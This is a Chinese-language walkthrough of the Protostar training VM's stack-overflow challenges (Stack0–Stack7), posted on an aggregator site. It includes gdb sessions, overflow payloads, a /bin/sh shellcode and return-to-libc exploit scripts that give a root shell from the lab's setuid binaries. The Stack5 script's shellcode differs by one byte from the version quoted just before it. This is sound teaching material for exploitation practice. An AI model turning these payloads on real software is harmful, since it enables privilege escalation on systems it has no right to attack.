PWN入门Protostar靶场Stack系列

Protostar靶场地址

https://exploit.education/protostar/

溢出

源码分析

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>int main(int argc, char **argv)
{volatile int modified;          //定义一个变量char buffer[64];           //给buffer变量定义数组,c语言中一个字符数就是一个字符串modified = 0;            //modified变量=0gets(buffer);             //获取输入,到buffer变量里if(modified != 0) {               //如果modified不等于0printf("you have changed the 'modified' variable\n");   } else {                        printf("Try again?\n");     }
}

分析源码可以看见第8行,定义的字符串数组是64位。按照溢出的思路,我们应该是需要加一位字符串,也就是64位,这样子就可以溢出了。
而且通过11行可以看见,gets函数如果将继续存储字符当超过缓冲区的末端,将会影响计算机的安全。这是一个危险的函数

python -c 'print "B"*65'|./stack0

使用python输出字符串,或者echo输出,可以看见成功破解成勋
image.png

汇编分析

gdb调试

使用gdb调试程序

gdb stack0
set disassembly-flavor intel 参数让汇报代码美观一点
disassemble main  显示所有的汇编程序指令

image.png
这里主要看第8行和第9行,第8行执行了gets函数,第9行:这行汇编指令表示将存储在%esp寄存器值加上0x5c偏移处的内容(内存地址)加载到%eax寄存器中。%esp是堆栈指针寄存器,通常用于指向栈顶,而%eax是通用寄存器,用于存储数据和地址。

0x080483f4 <main+0>:    push   %ebp
0x080483f5 <main+1>:    mov    %esp,%ebp
0x080483f7 <main+3>:    and    $0xfffffff0,%esp
0x080483fa <main+6>:    sub    $0x60,%esp
0x080483fd <main+9>:    movl   $0x0,0x5c(%esp)
0x08048405 <main+17>:   lea    0x1c(%esp),%eax
0x08048409 <main+21>:   mov    %eax,(%esp)
0x0804840c <main+24>:   call   0x804830c <gets@plt>
0x08048411 <main+29>:   mov    0x5c(%esp),%eax
0x08048415 <main+33>:   test   %eax,%eax
0x08048417 <main+35>:   je     0x8048427 <main+51>
0x08048419 <main+37>:   movl   $0x8048500,(%esp)
0x08048420 <main+44>:   call   0x804832c <puts@plt>
0x08048425 <main+49>:   jmp    0x8048433 <main+63>
0x08048427 <main+51>:   movl   $0x8048529,(%esp)
0x0804842e <main+58>:   call   0x804832c <puts@plt>
0x08048433 <main+63>:   leave
0x08048434 <main+64>:   ret
End of assembler dump.

对这两行地址进行断点调试

b *0x0804840c
b *0x08048411

image.png
然后输入这个命令:

define hook-stop

这个工具可以帮助我们在每一步操作停下来后,自动的运行我们设置的命令:

info registers   //显示寄存器里的地址
x/24wx $esp      //显示esp寄存器里的内容
x/2i $eip        //显示eip寄存器里的内容
end              //结束

image.png
输入r运行第一个断点
image.png
输入n命令,执行下一步。下一步是gets函数
image.png
通过观察可以发现, 当0x41414141填满到0x00000000的时候, 从当前的0x41414141往下输出 。 刚好输出到到0x00000000的时候,有四行164+1个A就可以溢出了,刚好也是65位字符。(其中一个字节有8位,然后4个A就刚好8位,而一行有4个字节,所以一行的字符串数位44=16,4行也就是4*16了)
image.png
经过测试,可以看见确实是这样子
继续下一步n执行,可以看见程序最终破解成功。
image.png
至于为什么是到 0x00000000

x/wx $esp+0x5c            //查看esp地址+0x5c偏移地址的内容

查看内存中以esp寄存器为起点加上偏移量0x5c的地址的内容。在汇编层面,esp通常是栈指针,偏移量代表相对于栈顶的位置。使用x命令表示检查内存内容,wx表示以十六进制方式显示字的格式。
image.png

更改eip寄存器的值

什么eip寄存器

总的来说eip存储了下一条即将被执行的机器指令的内存地址,这个寄存器在执行指令时告诉 CPU 下一步应该执行哪条指令

破解程序

设置断点,其他断点都可以,我们主要是看eip的值

b main //函数名设置断点
b *main //指定main函数的地址设置断点

我们可以查看程序头,运行程序到断点处

r
info registers //查看所有寄存器的值

image.png
显示程序中main函数的反汇编代码

disassemble main

image.png
可以看见如果我们输入的值和程序不一样,就会跳转到0x8048427这个地址。如果我们的eip值跳转到0x08048419地址,就会执行下面的put函数,意味着破解成功

set $eip=0x08048419 //设置eip寄存器的地址
n // 执行下一条指令

image.png
最后可以看见程序直接破解成功了

修改eax寄存器的值

什么是eax寄存器

它主要用于存储函数返回值、算术运算的临时数据和通用数据等。在函数调用过程中,eax 通常用于存储函数的返回值。

破解程序

显示程序中main函数的反汇编代码,可以知道0x08048415地址,是进行比较判断的值
image.png
查看源代码,可以看见不为0的时候,就会执行下一个条件
image.png
现在我们来调试这个地址的断点

b *0x08048415 //对这个地址进行断点
r //开始调试程序的断点
info registers //显示寄存器的所有信息

image.png
修改eax寄存器的值为1

set $eax = 1

继续执行n下一步指令,可以看见程序破解成功。
image.png

x86架构

x86的读取,读取主要是由低到高的
题目来源:

https://exploit.education/protostar/stack-one/

源码

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>int main(int argc, char **argv)
{volatile int modified;char buffer[64];if(argc == 1) {errx(1, "please specify an argument\n");}modified = 0;strcpy(buffer, argv[1]);if(modified == 0x61626364) {printf("you have correctly got the variable to the right value\n");} else {printf("Try again, you got 0x%08x\n", modified);}
}

从第6行到13行可以看见,启动程序必须后面有一些输入出,才能载入。后面的代码和前面的其实差不多。
这里我们主要是要指定x86架构的一个知识点,就是我们已经知道了,如果要想破解程序。那就必须让modified变量等于0x61626364这个十六进制。
好,现在让我们尝试一遍,之前的溢出方式。
image.png

define hook-stop //启动程序的时候,会自动显示下面那些设置
x/48wx $esp //显示48个十六进制,esp寄存器的内容
x/2i $eip //显示下两条的eip存储的指令

image.png
然后指定要断点的地址

b *0x080484ab

启动程序

r AAAAAAAA

image.png
通过查看esp地址+0x5c偏移地址的内容,我们知道了需要64位才能缓冲区溢出

x/wx $esp+0x5c

几乎和挑战1方法一样。
0x61626364的十六进制是abcd
image.png
所以,第一个没成功,是因为读取是由低高的
image.png

环境变量溢出

题目来源

https://exploit.education/protostar/stack-two/

源代码

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>int main(int argc, char **argv)
{volatile int modified;char buffer[64];char *variable;variable = getenv("GREENIE");if(variable == NULL) {errx(1, "please set the GREENIE environment variable\n");}modified = 0;strcpy(buffer, variable);if(modified == 0x0d0a0d0a) {printf("you have correctly modified the variable\n");} else {printf("Try again, you got 0x%08x\n", modified);}}

方法没变,只是溢出的方式奇怪了,是环境变量。getenv函数是获取当前的环境变量。源代码中,获取的是GREENIE环境变量的路径。
溢出方式:

export GREENIE=$(python -c"print 'A'*64+'\x0a\x0d\x0a\
x0d'"); ./stack2

可以看见破解程序成功
image.png

函数地址溢出

https://exploit.education/protostar/stack-three/
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>void win()
{printf("code flow successfully changed\n");
}int main(int argc, char **argv)
{volatile int (*fp)();char buffer[64];fp = 0;gets(buffer);if(fp) {printf("calling function pointer, jumping to 0x%08x\n", fp);fp();}
}

从源代码中的第六行和到第九行可以看见是自定义的win函数,如果调用win函数,则程序破解成功。

void win()
{printf("code flow successfully changed\n");
}
  • 第一行argc 表示命令行参数的数量,argv 是一个指向字符串数组的指针,这些字符串是命令行传递给程序的参数。
  • 第二行声明了一个指向函数的指针 fp。volatile 关键字告诉编译器这个变量的值可能会以编译器不可预知的方式改变,因此在优化时需要特别小心处理这个变量。这个指针被设定为指向返回 int 类型的函数。
  • 我们可以看见第六行的fp指针设置为0,也就是意味着,是空指针,不会跳转任何地址
int main(int argc, char **argv)
{volatile int (*fp)();char buffer[64];fp = 0;

指针变量

指针变量是一种特殊类型的变量,其存储的是另一个变量的内存地址,而不是数据值本身。
下面是指针变量的一些常见特点:

  • 存储地址:指针变量存储的是另一个变量的地址,而不是直接存储数据。
  • 数据类型:每个指针都有一个特定的数据类型,这表明了指针指向的变量类型。例如,int * 是指向整型变量的指针,char * 是指向字符变量的指针。
  • 间接引用:通过指针,我们可以间接地访问或修改其指向地址上的数据。这称为“解引用”。
  • 动态内存分配:在C和C++中,指针经常用于动态内存分配。
  • 数组和指针:指针和数组在C语言中紧密相关。数组名本身就是一个指向数组第一个元素的指针。
  • 指针运算:可以对指针进行某些类型的算术运算,例如增加或减少指针的值,这样它们就可以指向内存中的下一个或上一个位置。
  • 空指针:指针可以被设置为 NULL 或 nullptr(在C++11及以后),表示它不指向任何地址。
  • 指针的指针:你甚至可以有指向另一个指针的指针,这被称为多级指针,如 int ** 是一个指向 int * 类型的指针。

溢出

当fp等于一个有效的函数指针时,会进行输出,并跳转到fp所指向的函数。

  if(fp) {printf("calling function pointer, jumping to 0x%08x\n", fp);fp();}
}

因为fp在代码中已经设置为0了,如果要想进行改变的话,就要通过溢出64位,才能进行操控指针变量。

gdb调试

查看main函数,这两行是我们需要溢出的地方,因为call指令执行eax寄存器里的值,我们需要将win函数溢出覆盖到0x08048471的地址就好了
image.png
如果不溢出,可以看见程序直接跳转指定的输出了
image.png
添加垃圾数据溢出到够64位就好了
image.png

溢出加函数覆盖

查看win函数地址可以在gdb指令使用,第一行地址就是了

disassemble win

image.png
或者

objdump -x ./stack3 |grep win

image.png
溢出数据+覆盖的函数地址

python -c "print('A'*64+'\x24\x84\x04\x08')"| ./stack3

可以看见破解成功
image.png

leave和ret指令

leave 和 ret 是 x86 汇编语言中的两个指令,通常在函数的退出过程中使用。

leave 指令

leave 指令用于将栈帧恢复到调用函数之前的状态。它的作用相当于两个指令的组合:mov esp, ebp 和 pop ebp。

ret 指令

ret 指令用于返回地址函数

题目地址:

https://exploit.education/protostar/stack-four/

源代码:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>void win()
{printf("code flow successfully changed\n");
}int main(int argc, char **argv)
{char buffer[64];gets(buffer);
}

可以看见,我们虽然可以通过第13行进行64位的溢出,但是,我们需要调用win函数的地址,才能破解程序。那么这里就需要用到ret指令的特性,通过溢出,来修改ret指令返回的地址为win函数地址。

set disassembly-flavor intel
disassemble main

image.png
对leave指令地址进行断点
image.png
可以看见刚开始运行的程序,是这样子的,记录下来
image.png
准备到ret指令运行了,n下一步调试
image.png
在这里我们知道了,ret指令的地址是0xb7eadc76,我们要对它进行溢出覆盖为我们想要破解的win函数地址。

溢出覆盖

重新断掉调试,按r
image.png
可以计算出,需要76+win函数地址才能溢出覆盖。

python -c "print('A'*76+'win函数地址')"|./stack4

win函数地址获取,可以看见是0x080483f4
image.png
image.png
最后破解程序

python -c "print('A'*76+'\xf4\x83\x04\x08')"|./stack4

image.png

写入shellcode

题目地址

https://exploit.education/protostar/stack-five/

源码分析

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>int main(int argc, char **argv)
{char buffer[64];gets(buffer);
}

可以看见这个程序的作用是只接受我们的输入

栈&esp寄存器

ESP 是 x86 架构中的一个寄存器,全称是 “Extended Stack Pointer”,它是栈指针寄存器。ESP 用于指向栈的顶部,即栈中最新压入的数据的位置。
在栈溢出攻击中,攻击者可能会尝试通过修改 ESP 或覆盖返回地址,来劫持程序的控制流,使其执行攻击者注入的代码。

setuid位

只要权限位有s,意味着执行这个程序的时候是root权限
image.png

ret指令溢出+堆栈shellcode写入

破解思路

因为esp寄存器控制着数据,所以我们的最终目的,是溢出加上写入恶意代码获得/bin/bash的root权限。因为有setuid位,所以可以得到root权限。

shellcode

这是一个linux x86架构执行/bin/sh的shellcode,来源于:

http://shell-storm.org/shellcode/files/shellcode-811.html

shellcode:

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

破解

通过断点调试,获得ret指令地址,可以看见继续按n下一步,就可以获得ret的地址了
image.png
按n,可以看见ret的地址是:0xb7eadc76。同时它也是我们需要溢出的地址。同时esp寄存器的0xbffff7d0地址是我们需要进行堆栈写入的地方。
image.png

0xbffff7d0 实际上是栈上的地址,通常对应于栈指针 esp 的值。在这个场景中,这个地址可能被用来覆盖函数返回地址 eip。
攻击者通常希望将 eip 的值修改为指向攻击者注入的代码的地址,从而在函数返回时跳转到攻击者指定的代码区域。
这种类型的攻击通常称为栈溢出攻击,其中溢出的数据会覆盖栈上的关键信息,如返回地址。
所以,在这个代码中,0xbffff7d0 作为填充和攻击代码之间的位置,可能用于达到覆盖返回地址的目的。

现在我们知道了,ret溢出的地址,我们重新断掉调试一下。用gdb调试leave的地址:

disassemble main
b *0x080483d9
r
x/100wx $esp

image.png
通过计算,可以知道要想溢出445-4个地址位,也就是需要76个字符,才能溢出ret地址。然后进行覆盖地址。

脚本编写

import structoverflow = "A" * 76
eip = struct.pack("I",0xbffff7d0)
nop = "\x90"*10
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x88"print overflow+eip+nop+shellcode
  • 第三行是,溢出ret返回地址。第四行eip变量,是用二进制数据写入堆栈esp地址到ret的返回地址。
  • 第5行,nop意味着空变量,不进行任何操作。不改变计算机的任何操作和值。
  • 第6行是shellcode,linux x86架构执行/bin/sh的shellcode
  • 总的来说是,溢出地址后,覆盖了地址是堆栈的地址(因为它可以控制数据)。最后在配合空变量还有shellcode一起执行,成功获得root的权限
(python stack5exp.py ; cat)| /opt/protostar/bin/stack5

其中括号是为了保存临时的全部输出,最后让输入到stack5程序中。
cat的特性,如图:直接输入cat回车,然后随便打可以看见都是我们自己输入的输出
image.png
image.png
最后可以看见获取到了root权限,成功破解

ret to libc

“ret to libc”,其中是为了溢出ret地址从而进行覆盖为libc库中某个函数的地址,比如”system“函数可以用来执行系统命令。我们可以通过这个函数,构造一个恶意的参数给它,从而获取shell。

libc库

程序为了调用函数,就会到指定的libc库里查找并执行
题目:

https://exploit.education/protostar/stack-six/

stack6源代码:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>void getpath()   //定义一个名为getpath的函数
{char buffer[64];unsigned int ret;printf("input path please: "); fflush(stdout);  //输出字符串input path please: gets(buffer);  //获取用户输入,将输入存储到buffer函数变量里ret = __builtin_return_address(0);   //获取ret返回的内存地址if((ret & 0xbf000000) == 0xbf000000) {   //如果内存地址的前两位是0xbfprintf("bzzzt (%p)\n", ret);  //输出bzzzt_exit(1);}printf("got path %s\n", buffer);  //输出got path和用户的输入
}int main(int argc, char **argv)  //主函数
{getpath();  //调用getpath函数
}

破解思路

由于程序的主要调用的函数是getpath,用gdb查看getpath函数
image.png

ret溢出字符位

然后进行断点调试

x/wx ret
x/100wx $esp

可以看见ret指令的地址是0x8048505,这是我们要覆盖的。通过计算可以,知道要覆盖ret指令的返回地址需要,80个字符位
image.png

获取system函数地址

继续输入gdb指令,获取system的函数地址,可以看见是 0xb7ecffb0。获取system函数地址是为了可以执行命令,所以需要它

p system

image.png

程序调用恶意字符串的完整地址

虽然我们我们有了system函数地址,但是我们还需要构造恶意的参数传入到system函数中。
查找程序内存映射(内存映射用于将文件或其他设备的内容映射到进程的地址空间),从而找到stack6的基地址:0xb7e97000

i proc mappings

image.png
现在我们已知 0xb7e97000 libc库基地址,如果想要调用licb库中的函数、参数什么的。就必须调用程序字符串的完整地址,其中它:
程序调用字符串的完整地址 = libc库基地址+字符串的偏移地址

strings -t d /lib/libc-2.11.2.so|grep "/bin/sh"

查找我们所需字符串的偏移地址 :1176511 ,有了它才能获取shell
image.png
可以知道程序调用字符串的完整地址是 0xb7e97000+1176511

exp脚本编写

import structret_overflow = "A"*80
system = struct.pack("I",0xb7ecffb0)
system_ret = "A"*4
shellcode = struct.pack("I",0xb7e97000+1176511)
print ret_overflow+system+system_ret+shellcode
  1. ret_overflow 是 ret溢出字符位
  2. system变量是,利用pack模块二进制写入system函数的地址
  3. system_ret变量,由于调用system函数会有ret的返回值,这里我们自己创造一个。至于为什么要4个字符A,是为了满足地址的十六进制。
  4. shellcode变量则是,要传入到system函数的参数字符串。用二进制将地址写入进去


最后破解程序

(python stack6exp.py ; cat)|/opt/protostar/bin/stack6

image.png

寻找ret地址

题目地址:

https://exploit.education/protostar/stack-seven/

源代码:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>char *getpath()
{char buffer[64];unsigned int ret;printf("input path please: "); fflush(stdout);gets(buffer);ret = __builtin_return_address(0);if((ret & 0xb0000000) == 0xb0000000) {printf("bzzzt (%p)\n", ret);_exit(1);}printf("got path %s\n", buffer);return strdup(buffer);
}int main(int argc, char **argv)
{getpath();
}

和stack-six代码的区别:

char *getpath()
{// ...return strdup(buffer);
}

这段代码的 getpath 函数的返回类型是 char *,即返回一个字符指针。,函数从用户输入中获取路径,并使用 strdup 函数创建了路径的副本,最后返回这个副本。

破解

正因为有了副本,只不过,我们需要添加ret指令的地址,有了ret才能返回我们所需要执行的恶意函数。首先我们的解题思路还是溢出:ret To libc。

objdump寻找ret指令的地址

寻找指令的十六进制地址

objdump -D ./stack7 |grep ret

随便选一个ret指令地址都可以
image.png

exp

溢出位+ret指令地址+system函数地址+system_ret返回地址+shellcode地址

import structret_overflow = "A"*80
ret_addr = struct.pack("I",0x8048383)
system = struct.pack("I",0xb7ecffb0)
system_ret = "A"*4
shellcode = struct.pack("I",0xb7e97000+1176511)
print ret_overflow+ret_addr+system+system_ret+shellcode

可以看见破解成功

(python stack7exp.py ; cat) | /opt/protostar/bin/stack7

image.png
参考文章:

https://blog.csdn.net/qq_45894840/article/details/129490504
https://blog.csdn.net/qq_45894840/article/details/132688653
https://blog.csdn.net/qq_45894840/article/details/132720953
https://blog.csdn.net/qq_45894840/article/details/134028680

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/645731.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Git 入门精讲

我们为什么要学习git&#xff1f; 就当下的发展而言&#xff0c;只要你从事开发就一定会接触git。作为最强大的分布式版本控制器&#xff0c;git 与 svn 有着本质上的区别。 Git是一种分布式版本控制系统&#xff0c;每个开发者都可以在本地维护完整的代码库&#xff0c;可以离…

c++ 加密与解密代码(普通加密 + 凯撒加密 + 图灵来了都解不开的加密)

当你和你的好朋友聊天的时候&#xff0c;你们的聊天内容很容易就被看出来&#xff0c;那么小天狼星这边可以给到一些建议~~ 一、用另一种语言 通常来说&#xff0c;使用除中文和其他常用语言外的语言是一个优秀的选择&#xff01; 例如&#xff1a;乌伯克语、阿亚帕涅科语。 …

智能泊车,再上热搜

编者按&#xff1a;相比于行车&#xff0c;低速可控场景&#xff0c;更有利于泊车功能快速迭代。同时&#xff0c;对于部分消费者来说&#xff0c;泊车智能化也是加分项。 智能泊车赛道&#xff0c;正在重新成为各路势力争夺的焦点。而上一次“高潮”&#xff0c;要追溯到2018年…

开源客户沟通平台Chatwoot账号激活问题

安装docker docker-compose 安装git clone https://github.com/chatwoot/chatwoot 下载之后根目录有一个docker-compose.production.yaml将其复制到一个目录 重命名 docker-compose.yaml 执行docker-compose up -d 构建 构建之后所有容器都安装好了 直接访问http://ip:3…

护眼台灯怎么选——明基、书客、孩视宝实测横评

最近护眼台灯的热度真是不小&#xff0c;许多博主纷纷推荐。考虑到孩子即将放寒假&#xff0c;市场上的产品也是五花八门&#xff0c;于是我决定认真研究一下&#xff0c;找出其中的水货和宝藏产品。我挑选了市场上口碑较好的3款产品进行深入评估&#xff0c;主要从照度、显色指…

Revit二次开发 设置材质

设置此处材质&#xff0c;需要在材质浏览器中创建材质&#xff0c;根据材质名字设置此材质。 代码如下&#xff1a; Material material new FilteredElementCollector(doc).OfClass(typeof(Material)).FirstOrDefault(x > x.Name "窗框") as Material; Element…

如何利用streamlit 將 gemini pro vision 進行圖片內容介紹

如何利用streamlit 將 gemini pro vision 進行圖片內容介紹 1.安裝pip install google-generativeai 2.至 gemini pro 取 api key 3.撰寫如下文章:(方法一) import json import requests import base64 import streamlit as st 讀取圖片檔案&#xff0c;並轉換成 Base64 編…

Android SeekBar 进度条圆角

先看下效果图&#xff1a; 之前&#xff1a; 优化后&#xff1a; 之前的不是圆角是clip切割导致的 全代码&#xff1a; <SeekBarandroid:layout_width"188dp"android:layout_height"wrap_content"android:background"null"android:focusa…

风速预测 | Python基于CEEMDAN-CNN-Transformer+ARIMA的风速时间序列预测

目录 效果一览基本介绍程序设计参考资料 效果一览 基本介绍 CEEMDAN-CNN-TransformerARIMA是一种用于风速时间序列预测的模型&#xff0c;结合了不同的技术和算法。收集风速时间序列数据&#xff0c;并确保数据的质量和完整性。这些数据通常包括风速的观测值和时间戳。CEEMDAN分…

使用Spring Boot实现基于HTTP的API

Spring Boot是一个用于简化Spring应用程序开发的框架&#xff0c;它提供了一系列的开箱即用的功能&#xff0c;使得快速构建RESTful Web服务和基于HTTP的API变得简单。以下是使用Spring Boot实现基于HTTP的API的步骤&#xff1a; 添加依赖&#xff1a;在Maven项目中&#xff0c…

企业能源消耗监测管理系统是否可以做好能源计量与能耗分析?

能源消耗与分析是能源科学管理的基础&#xff0c;也可促进能源管理工作的改善&#xff0c;在企业中能源管理系统的作用也愈加重要。 首先&#xff0c;能源计量是能源管理的基础&#xff0c;通过能源精准计老化&#xff0c;容易出现测量设备不准确以及其他一些人为因素原因导致…

pve7.x、8.x版本一键升级、换源、优化工具脚本推荐

每次安装完pve之后都需要、换各种debain源、pve源、lxc源等、去掉弹窗、合并local-lvm等一系列的工作。还有玩硬件直通的优化。 偶然发现网上有大佬编写的一键脚本&#xff0c;pve_source 官网地址pve_source - X86派 - 迷你硬件玩家集中地 需要注册登录后能看到最新的地址 …

Oracle BIEE 示例(一)数据透视表2

1 背景 版本:BIEE 12C 视图:数据透视表 实现内容(顺序与具体内容不一致): 2 空列显示(方法一) 2.1 问题 列为空时,标题栏不显示信息。 2.2 期望 即使数据为空,也要显示列名。 2.3 官方资料 2.3.1 操作步骤 2.3.1.1 要在分析级别关闭空值隐藏,请执行以下操作…

操作无法完成,因为文件已在Windows资源管理器中打开,如何解决?以及如何将哔哩哔哩下载好的视频导出到电脑中播放?— 以vivo手机为例

前言 想删除流氓软件的时候&#xff0c;提示操作无法完成&#xff0c;因为文件已在Windows资源管理器中打开&#xff0c;但打开任务管理器&#xff0c;似乎又没有符合的正在执行的程序&#xff0c;更别说打开让人看到头疼的资源监视器了&#xff0c;本文将用一招解决如上问题 …

从一个main.cpp文件开始构建Qt项目【浅析】

目录 操作步骤 编译阶段 尝试运行 操作步骤 最初只有一个main.cpp文件。 然后在Qt的mingw命令行中进行以下操作&#xff1a; 这样就会在main.cpp的路径下生成一个.pro文件&#xff1a; 用QC打开后是这个样子&#xff1a; 所以在这里 qmake -project 的作用就是生成一个.…

【开源】基于JAVA语言的假日旅社管理系统

目录 一、摘要1.1 项目介绍1.2 项目录屏 二、功能模块2.1 系统介绍2.2 QA 问答 三、系统展示四、核心代码4.1 查询民宿4.2 新增民宿评论4.3 查询民宿新闻4.4 新建民宿预订单4.5 查询我的民宿预订单 五、免责说明 一、摘要 1.1 项目介绍 基于JAVAVueSpringBootMySQL的假日旅社…

配置路由策略案例

知识改变命运&#xff0c;技术就是要分享&#xff0c;有问题随时联系&#xff0c;免费答疑&#xff0c;欢迎联系&#xff01; 厦门微思网络​​​​​​ https://www.xmws.cn 华为认证\华为HCIA-Datacom\华为HCIP-Datacom\华为HCIE-Datacom Linux\RHCE\RHCE 9.0\RHCA\ Oracle O…

1秒解决“整合磁盘时出错: 指定的虚拟磁盘需要进行修复”

引言 Linux初学者会时常报以下的错误&#xff0c;导致虚拟机打不开 原因 总的来说&#xff0c;就是没有正常关闭虚拟机导致的虚拟磁盘 (.vmdk)本身有一个磁盘保护机制&#xff0c;为了防止多台虚拟机同时访问同一个虚拟磁盘 (.vmdk)带来的数据丢失和性能削减方面的隐患&#…

将AWS iot消息数据发送Kinesis Firehose Stream存向S3

观看此文章之前&#xff0c;请先学习AWS iot的数据收集&#xff1a; 使用Linux SDK客户端向AWS Iot发送数据-CSDN博客 1、工作原理&#xff1a; 1.1 规则 规则可让您的设备与 AWS 服务进行交互。分析规则并根据物品发送的消息执行操作。您可以使用规则来支持任务&#xff0…

C++类和对象(上)

✨Blog&#xff1a;&#x1f970;不会敲代码的小张:)&#x1f970; &#x1f251;推荐专栏&#xff1a;C语言&#x1f92a;、Cpp&#x1f636;‍&#x1f32b;️、数据结构初阶&#x1f480; &#x1f4bd;座右铭&#xff1a;“記住&#xff0c;每一天都是一個新的開始&#x1…